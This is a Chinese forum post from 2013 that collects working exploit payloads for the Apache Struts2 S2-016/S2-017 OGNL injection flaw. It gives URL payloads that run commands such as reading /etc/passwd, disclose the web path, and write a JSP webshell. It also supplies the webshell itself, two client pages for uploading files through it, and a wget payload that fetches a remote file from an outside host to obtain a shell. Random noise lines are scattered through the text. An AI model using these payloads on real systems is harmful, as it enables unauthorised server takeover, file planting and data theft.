标题:
Struts2 S2-016/S2-017漏洞执行代码
作者:
admin
时间:
2013-7-18 23:03
标题:
Struts2 S2-016/S2-017漏洞执行代码
大家都发了,我就整理了一下。友情提示,自己小命比shell重要哦。
( d& Z# T/ V% f s& b+ J
C& ]( S! K8 z& _" a$ w) H, I7 N
喜欢就点一下感谢吧^_^
4 d4 E' |8 E8 e0 i: @7 E: T, @' z' n
; C0 j0 a7 h; P: l$ {3 k
带回显命令执行:
3 c6 z# M, F7 L$ i
- h0 \0 l7 h* V8 }# @
http://www.example.com/struts2-blank/example/X.action?redirect:
${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
3 j- Q# }2 G( c2 L7 @1 _% S, q
$ a, U: w ~, |7 M6 r6 c4 ]$ Q
! ^$ h* K' a7 ]0 e5 r9 v. S; y
/ f q# G: O) t/ B: O
, O- c$ \5 j1 u/ {/ h" N
2 z# f( D& [7 M: V& R, F
8 b# }( A) E, V: P7 k! Q. @
# X$ G- H0 M$ a y" u5 H0 s
爆路径:
( `5 U9 L$ K- f; \' @7 b- h
0 o$ w0 s# W8 E6 o* }$ R2 p
http://www.example.com/struts2-b ... 8%29.close%28%29%7D
& F5 [* Q& U1 L& Q7 Y% G
7 S2 H8 m2 R* W% F4 d; r2 [4 O
' T/ F W! d2 X* F3 f
1 M+ ?6 S* [+ H# H! i, C
! z: e" h% c) m- s( V1 D
8 Q0 n& _! B2 A
写文件:
9 U1 b, ~" j) }7 {' p
% F9 W0 C C5 \9 _ p1 H
http://www.example.com/struts2-blank/example/X.action?redirect:
${
1 e$ b* Q b1 l0 i. y- `3 F
5 e: w* g4 Z, P& U" Y. O
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
3 k/ L3 c0 c8 ~ X, K
% H3 {0 f' L4 z, v
%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
4 H5 G) ~2 m% A" ~6 ?
4 @% O3 E) v4 {( O3 v
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
8 S: h0 G6 p! _) _2 _
1 @6 e- i4 _0 O. Q6 Q
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
" U# _. C9 Q* D( J( z; B: O7 i
+ g* w5 h' o c$ @
& e6 M( u0 M) M: c! c0 r/ w9 L; r
' H6 E( E; U* h) k2 ]3 G7 n3 y
写入的文件内容:
J. ]3 M, f/ g- h. ?+ K
3 w+ O6 T% g5 J2 d# G# j
<%-- Review note: on any request that carries parameter `f`, this scriptlet writes the raw
     bytes of parameter `t` to a file whose path is the web application root plus `f`.
     There is no authentication, no validation of `f`, no size limit on `t`, `getBytes()`
     uses the platform default charset, and the FileOutputStream is never closed. --%>
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
$ @' ~' M0 x2 p, S
, L( |( i3 L/ [, t9 Y# c% O8 W
其实就是一个jsp的小马,需要客户端配合
+ ?. P" a5 J$ J' s1 O; B6 _. o
( k' n) ?; O' U$ n" a2 E/ h2 B
参数f是文件名,t是内容
, [1 P; E4 N$ K U( Q
/ v8 }6 ?' R9 ~# k
客户端:
- L6 ^# h; B' U
- ^, V, E- A3 w* P5 P4 X* @7 o
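<!-- Submits `t` (the file body) to css3.jsp; the file name `f` is fixed in the action URL.
     The <center> element was never closed in the original and `width` is not a textarea
     attribute, so both are corrected here. -->
<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
<textarea name="t" cols="120" rows="10">your code</textarea>
<center>
<input type="submit" value="提交">
</center>
</form>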
' K/ Z. Q) b$ G1 Y7 p5 d
' j+ K" d. W- ^. g% V
就在当前目录建立一个fjp.jsp
, G0 h( b% f; I/ R/ z- L
8 u, p7 o1 n+ h
shell:
http://www.example.com/struts2-blank/example/fjp.jsp
0 i$ t9 S4 ~6 g% G9 a( ]
, ~' a% b- X0 c M$ y; `
! W5 \% t- Y) B/ I$ P5 Q
* q% _0 A5 w) z+ l# f; M- w
还有@园长的一个客户端:
* b9 m. ^/ Q5 O/ P- T/ \- _; [
9 I% m2 B& Q2 O3 e+ D
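<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>jsp-园长</title>
<!-- The original placed <style> and <script> between </head> and <body>, where they
     belong to neither element; both now live inside <head>. -->
<style>
.main{width:980px;height:600px;margin:0 auto;}
.url{width:300px;}
.fn{width:60px;}
.content{width:80%;height:60%;}
</style>
<script>
// Browser side of the file-writing JSP quoted earlier on this page: the form POSTs
// the parameters `f` (file name) and `t` (file body) to whatever URL is typed into
// the URL field. For monitoring purposes, that POST carrying `f` and `t` to a .jsp
// is the only server interaction this page performs.
function upload(){
    var url = document.getElementById('url').value,
        content = document.getElementById('content').value,
        fileName = document.getElementById('fn').value,
        form = document.getElementById('fm');
    // Refuse empty fields; each check aborts with its own message.
    if(url.length == 0){
        alert("Url not allowd empty!");
        return;
    }
    if(content.length == 0){
        alert("Content not allowd empty!");
        return;
    }
    if(fileName.length == 0){
        alert("FileName not allowd empty!");
        return;
    }
    // The form has no static action attribute; the target comes from the URL field.
    form.action = url;
    form.submit();
}
</script>
</head>
<body>
<div class="main">
<form id="fm" method="post">
URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>
FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />
<a href="javascript:upload();">Upload</a>
<textarea id="content" class="content" name="t" ></textarea>
</form>
</div>
</body>
</html>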
4 }# c: u& B$ I: Z
0 W/ _' F" U! m8 O, F# }3 w9 b" F
6 {- v+ o! n& F3 z9 q& ]) C
7 Q* \( [: q7 i' k( A3 x
还有@X发的一个wget的getshell
" C: s$ }( ]1 V, R# N
4 p5 E$ G: z- A* F: o* ~
?redirect
{%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}
r; ? L( |8 }+ \
8 c3 J& n3 V' M5 t$ R+ ]
)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
# A f& b4 Y) z+ ~: t' u. C, y